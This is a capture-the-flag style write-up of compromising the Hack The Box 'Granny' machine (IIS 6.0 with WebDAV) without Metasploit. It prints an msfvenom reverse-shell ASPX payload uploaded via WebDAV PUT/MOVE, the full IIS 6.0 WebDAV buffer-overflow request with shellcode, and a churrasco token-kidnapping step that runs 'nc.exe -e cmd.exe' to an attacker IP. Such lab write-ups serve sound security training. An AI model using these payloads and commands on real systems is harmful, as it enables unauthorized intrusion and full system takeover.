Hack The Box - Granny Writeup (without MSF)
Description:
This is an easy rated box but was kind of a medium easy box for me. Doing this box without metasploit as part of my OSCP preparation.
Enumeration
Add granny.htb to hosts and start an nmap scan.
Nmap
kali@kali:~$ nmap granny.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 07:27 EDT
Nmap scan report for granny.htb (10.10.10.15)
Host is up (0.27s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 33.22 seconds
Looking at the web application, we can see an IIS page. Lets do some more enumeration to dig some more information.
Nikito
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.15
+ Target Hostname: granny.htb
+ Target Port: 80
+ Start Time: 2020-08-16 07:25:26 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.
+ OSVDB-5646: HTTP method 'DELETE' allows clients to delete files on the web server.
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (PROPPATCH COPY MKCOL LOCK SEARCH UNLOCK PROPFIND listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://granny/_vti_bin/_vti_aut/author.dll
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_private/: FrontPage directory found.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3300: /_vti_bin/: shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ 7941 requests: 0 error(s) and 32 item(s) reported on remote host
+ End Time: 2020-08-16 08:48:32 (GMT-4) (4986 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
We can see that the box is running iis 6.0 and have webdav enabled. We can try out some enumeration using davtest
Davtest
********************************************************
Testing DAV connection
OPEN SUCCEED: http://granny.htb
********************************************************
NOTE Random string for this session: 01SI88JBfR
********************************************************
Creating directory
MKCOL SUCCEED: Created http://granny.htb/DavTestDir_01SI88JBfR
********************************************************
Sending test files
PUT pl SUCCEED: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.pl
PUT asp FAIL
PUT php SUCCEED: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.php
PUT jsp SUCCEED: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.jsp
PUT jhtml SUCCEED: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.jhtml
PUT cgi FAIL
PUT cfm SUCCEED: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.cfm
PUT shtml FAIL
PUT txt SUCCEED: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.txt
PUT aspx FAIL
PUT html SUCCEED: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.html
********************************************************
Checking for test file execution
EXEC pl FAIL
EXEC php FAIL
EXEC jsp FAIL
EXEC jhtml FAIL
EXEC cfm FAIL
EXEC txt SUCCEED: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.txt
EXEC html SUCCEED: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.html
********************************************************
/usr/bin/davtest Summary:
Created: http://granny.htb/DavTestDir_01SI88JBfR
PUT File: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.pl
PUT File: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.php
PUT File: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.jsp
PUT File: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.jhtml
PUT File: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.cfm
PUT File: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.txt
PUT File: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.html
Executes: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.txt
Executes: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.html
We have permissions to write files with extensions of .txt and .html. But we can’t accomplish much with this. We have MOVE enabled. So what if we create a shell.txt file and move it to shell.aspx?
User Shell (Method 1 Webdav PUT/MOVE)
Cadaver
cadaver is a tool that can be used to interact with webdav to upload and move files.
-
Create a
aspxusingmsfvenomkali@kali:~/Desktop/htb/granny$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.15 LPORT=8082 -f aspx -o shell.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of aspx file: 2740 bytes Saved as: shell.aspx - upload the shell as
txtfile usingcadaverand move it toshell.aspxkali@kali:~/Desktop/htb/granny$ cadaver granny.htb dav:/> put shell.txt Uploading shell.txt to `/shell.txt': Progress: [=============================>] 100.0% of 2740 bytes succeeded. dav:/> move shell.txt shell.aspx Moving `/shell.txt' to `/shell.aspx': succeeded. - Start a
nclistener and browse the shell via browserkali@kali:~/Desktop/tools/win$ hip HTB IP:10.10.14.15/23 kali@kali:~/Desktop/tools/win$ nc -lvp 8082 listening on [any] 8082 ... connect to [10.10.14.15] from granny.htb [10.10.10.15] 1031 Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. c:\windows\system32\inetsrv>whoami whoami nt authority\network service c:\windows\system32\inetsrv>And we have a shell.
User Shell (Method 2 IIS 6.0 buffer overflow)
iis 6.0 has a buffer overflow related to webdav
Searchsploit
kali@kali:~/Desktop/htb/granny$ searchsploit iis 6.0 webdav buffer overflow
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | windows/remote/41738.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
A python exploit can be found here.
Start a listener and run the exploit with the kali machines ip and port.
kali@kali:~/Desktop/htb/granny$ python git.py
usage:iis6webdav.py targetip targetport reverseip reverseport
kali@kali:~/Desktop/htb/granny$ python git.py granny.htb 80 10.10.14.15 1337
PROPFIND / HTTP/1.1
Host: localhost
Content-Length: 1744
If: <http://localhost/aaaaaaa₩ᄑᄄᄀᆪンᄀトᄈ₩ᄂᄊ¦ンᄇᄄᄍ¦ᆳᄋ¦ᄑᄚユモᄅマ¦ᄀᄄ¥ルᆪ₩ᄉヤ₩ᄀナ ̄ᆬモ¥チᆲ¥ユᄃ₩ンᆪ ̄ヘᄂ¦リᄚᄀナ₩ᆬメ¥ミᄆ¦ᄆリ₩ᄅムノチ¦ネᄆタᄉ¥ᄀミ ̄ルᄂ₩ᄆヌ ̄ヤᄍ¥ムᆰ¥タᄡ¥ムテンメ¥チᄀ ̄ネᄇ₩ᄉヒ₩ᄚᄡ ̄ノヌ₩ノチ ̄ンヘ¥ナᄀ¥ᄀᄁ¦ンᄈ¥ノミ ̄ルᄚユト₩ᄀᆰ ̄ヘᄡ¦ᄍハᄀᆱ¦ᆬᄊ¦ᄍᄈ¦ᄆᆰ¥ンᄎ₩ᄑᄆ¥ᄀハ ̄ネᄚ ̄ンᆴ¦ᆳノ¥ノヘ¦ᄀᆪ₩ᄑフユヨユᄉ₩ルᆵルᄄ¦ムヘ¥チᄚᄄᄊ₩ノヒ₩ユラユミ₩ᄅᄇᄅᆱンᄁルリ₩ノネ₩ヤᄆ ̄チヤ₩ᄆᄍ¥チハ¥ムᄁ¥タᄈ ̄ユᄋ₩ᄅᄋ¦ナト ̄フᄡ₩ムᄊ¦ᄉニ¥ルヤ¦ンᆲ₩ユテリᄇノᄌ¥ンᄅ¦フᄌ₩ノᄇ¥ᄄᄚ ¥ᄂᄌ¥ムネツツ£ヒタ₩ᅠテ₩ᄆト¥ノヨ¦ᆲᄋ₩ᄆᆳ¦ᄑリ¥ᄀレᆬミ¦ᆬᆰ¥ᄀマ¦ᄅメ¦ナミ₩ルヘ£マタ₩ᅠテ¦ᅠᄡ₩ヤᄆ₩ᄑテ₩ᄍᆭムチ¦ヘᆲ£マタ₩ᅠテ¥ヘテ₩ᄅチチメ ̄フᄚ¥ᄀᆭ¦ノフチヒ₩ヘニ¥ナᄈᆬチᄅミ¦ᄅᆲ> (Not <locktoken:write1>) <http://localhost/bbbbbbbᆬネ₩ナᄉ¦ᄑテ₩ᄑᄃ₩ᆳᆵ¦ᄀナ ̄ルニ₩ンᄉ¦ミᄈ ̄ᄀᄆ¥ンᆬ¥ᄅᄁ¥ミᄉ¥ルᄀ₩ᆬメ₩ᄅモ¥ナラ ̄ᄀホ¥ᆬネ₩ヘユ¦ᆬᄆ¦ヘᄂ₩ムᄇ ̄ムᄄ¦ンリナᄍ ̄ヘᆱ₩ᆳユ₩ᄉネ¥チマᄅニ ̄ムᄆ₩ᄑヤムテ¥ᆬヨ₩ᄑᆵヘチ ̄ムラ₩ナᄄᄅᄇ ̄ンナ¦ᄉノ¥ンホ¥ムネ¦ᄚᄌ ̄ルᄎ ̄ユᄇ₩ノᆭ₩ᄍテ¦ᄀᆳ ̄ユネ₩ナᄋ¦ᄉレ ₩ナᄡ¦トᄈ¦ヘᆬ¥ノᄇ₩ᄉᄅ ̄ルᄆ¦ᄍᄂ₩ᄌᄍ₩ヘモ₩ᆳᄂ¥ナニ¦ᄐᄚᄀᆵノモ₩ンミ¦ユモᄅᆪトᄍ¦ᄑモ¦ムヨ₩ᄐᄊヘᄍ₩ᄀᄋᄅヨ₩ナハ ̄ᆬナ ̄リᄍ₩ᄚᄍ¦ヤᄆ ̄ムᄇ¥ヘᆬ¥ᄀハ¦ムホᄅト₩ᄚᄉ¥ᄅヨ₩ノチ₩ᄍᄇ₩リᄆ¥ᆬル¥ミᄈ ̄ナツ¥ᄀᆬ¥ᆬチナミ ̄タᄊ¥ンᄋ¦ムラ¥ヘᄀ£マタ₩ᅠテ₩ᄍマ₩ᅠタ₩ᄍマ₩ᅠタ¦ノヌルᆰ£マタ₩ᅠテ ¦ノラ¦ᄑᄡ¥ᆬヌ¥ネᄡ¦ᆳᆭ¦ᆳツムᄂᄀᆵ₩ツツ₩ᅠチ¥トᄉノᄎムᄎ¦ᄉヌ¦ムル¥ンラ→トモ₩ᅠタ ̄ナᄊ₩ᄍᆵ¬モᆪ₩ᅠチ£ムᅠ₩ᅠテᅩタᄒ£マタ₩ᅠテᆴ₩ᅠテナᆴムᄚ£ミᄡ₩ᅠテ¬ᄃᄃ₩ᅠチ←ホム₩ᅠタ ̄ᄂᄆ₩ルᆴ¦ᆬユ ̄チメ¥ムᆱルᆱノハᆬᄀ£ミワ₩ᅠテ₩ᄌナ₩ᅠタワᄇᆬᄄ¦ᄉᄅ ̄ルᆲ¦ムᄄ¦ᄉᄚ│ノニ₩ᅠタ¦ᄀᄋ ̄ノモ£ᄊᆰ₩ᅠツ ₩ᄑᆰ¦フᄉ£マᄌ₩ᅠテ¬ᄃᄃ₩ᅠチVVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJINDKSKPKPTKKQTKT0D8TKQ8RTJKKX1OTKIGJSW4R0KOIBJHKCKOKOKOF0V04PF0M0A>
Start a listener to receive the connections
kali@kali:~/Desktop/tools/win$ hip
HTB IP:10.10.14.15/23
kali@kali:~/Desktop/tools/win$ nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.15] from granny.htb [10.10.10.15] 1035
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
c:\windows\system32\inetsrv>
Root Shell
The box is missing quite a few updates. There are plethora of kernel exploits. I tried copying the binaries for the exploits, but none of them seems to work.
Windows server 2003 and 2008 have a token kidnapping vulnerability. We can execute the churrasco.exe binary to get system.
I was having trouble executing binaries copied to the system. I will be running binaries from impacket smb server.
We will be executing nc.exe to get a system shell.
c:\windows\system32\inetsrv>\\10.10.14.15\kali\churrasco.exe -d "\\10.10.14.15\kali\nc.exe -e cmd.exe 10.10.14.15 1234"
\\10.10.14.15\kali\churrasco.exe -d "\\10.10.14.15\kali\nc.exe -e cmd.exe 10.10.14.15 1234"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 680
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 684
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 688
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 696
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
Receive the shell using nc
kali@kali:~/Desktop/tools/win$ nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.15] from granny.htb [10.10.10.15] 1038
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\TEMP>whoami
whoami
nt authority\system
C:\WINDOWS\TEMP>
And we are system!
